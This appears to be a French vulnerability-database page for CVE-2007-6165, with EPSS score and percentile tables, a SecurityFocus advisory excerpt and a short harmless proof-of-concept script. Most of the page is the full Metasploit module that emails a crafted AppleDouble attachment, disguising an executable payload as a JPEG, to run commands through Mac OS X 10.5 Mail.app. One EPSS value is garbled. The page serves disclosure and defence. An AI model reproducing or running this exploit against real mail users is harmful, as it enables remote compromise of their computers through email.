CVE-2007-6165 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	29.5%	–	–
2022-04-03	–	–	29.5%	–	–
2023-03-12	–	–	–	13.93%	–
2024-03-17	–	–	–	13.93%	–
2024-06-02	–	–	–	13.93%	–
2024-08-25	–	–	–	11.75%	–
2024-10-06	–	–	–	13.3%	–
2024-12-22	–	–	–	31.14%	–
2025-01-19	–	–	–	31.14%	–
2025-03-18	–	–	–	–	38.55%
2025-03-18	–	–	–	–	38.55,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	96%
2022-04-03	97%
2023-03-12	95%
2024-03-17	96%
2024-06-02	96%
2024-08-25	95%
2024-10-06	96%
2024-12-22	97%
2025-01-19	97%
2025-03-18	97%
2025-03-18	97%

## # $Id: mailapp_image_exec.rb 10397 2010-09-20 15:59:46Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Mail.app Image Attachment Command Execution', 'Description' => %q{ This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], 'Version' => '$Revision: 10397 $', 'References' => [ ['CVE', '2006-0395'], ['CVE', '2007-6165'], ['OSVDB', '40875'], ['BID', '26510'], ['BID', '16907'] ], 'Stance' => Msf::Exploit::Stance::Passive, 'Payload' => { 'Space' => 8192, 'DisableNops' => true, 'BadChars' => "", 'Compat' => { 'ConnectionType' => '-bind -find', }, }, 'Targets' => [ [ 'Mail.app - Command Payloads', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'PayloadCompat' => { 'RequiredCmd' => 'generic perl ruby bash telnet', } } ], [ 'Mail.app - Binary Payloads (x86)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Mail.app - Binary Payloads (ppc)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], ], 'DisclosureDate' => 'Mar 01 2006' )) end def autofilter false end def exploit exts = ['jpg'] gext = exts[rand(exts.length)] name = rand_text_alpha(5) + ".#{gext}" data = rand_text_alpha(rand(32)+1) msg = Rex::MIME::Message.new msg.mime_defaults msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] dbl = Rex::MIME::Message.new dbl.header.set("Content-Type", "multipart/appledouble;\r\n boundary=#{dbl.bound}") dbl.header.set("Content-Disposition", "inline") # AppleDouble file version 2 # 3 entries - 'Finder Info', 'Real name', 'Resource Fork' # Real Name matches msf random generated 5 character name - (I cheated ala gsub) resfork = "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" + "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" + "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" + "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" + "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" + "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" + "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" + "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" + "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" + "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" + "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n" fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" ) cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>" cmd = '' if (target.arch.include?(ARCH_CMD)) cmd = Rex::Text.encode_base64(payload.encoded, "\r\n") else bin = generate_payload_exe cmd = Rex::Text.encode_base64(bin, "\r\n") end dbl.add_part(fork , "application/applefile;\r\n name=\"#{name}\"", "base64", "inline;\r\n filename=#{name}" ) dbl.add_part(cmd , "image/jpeg;\r\n x-mac-type=0;\r\n x-unix-mode=0755;\r\n x-mac-creator=0;\r\n name=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\n filename=#{name}" ) msg.parts << dbl send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end end

source: https://www.securityfocus.com/bid/26510/info Apple Mac OS X is prone to a vulnerability that can allow arbitrary code to run. This issue affects the Mail application when handling email attachments. Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. This will compromise the application and possibly the underlying operating system. This issue affects Mac OS X 10.5. NOTE: This vulnerability may be related to CVE-2007-0395 documented in BID 16907 (Apple Mac OS X Security Update 2006-001 Multiple Vulnerabilities). Although the issues seem similar in nature, this may not be the very same underlying vulnerability. We will update this BID as more information emerges. UPDATE (November 21, 2007): Reports indicate that this issue occurs because of an error in the application's quarantine feature. We have not confirmed this information. UPDATE (December 17, 2007): This vulnerability stems from an unspecified implementation issue in the Launch Services application. https://www.securityfocus.com/bid/16907 /bin/ls -al echo echo echo "heise Security: You are vulnerable." echo echo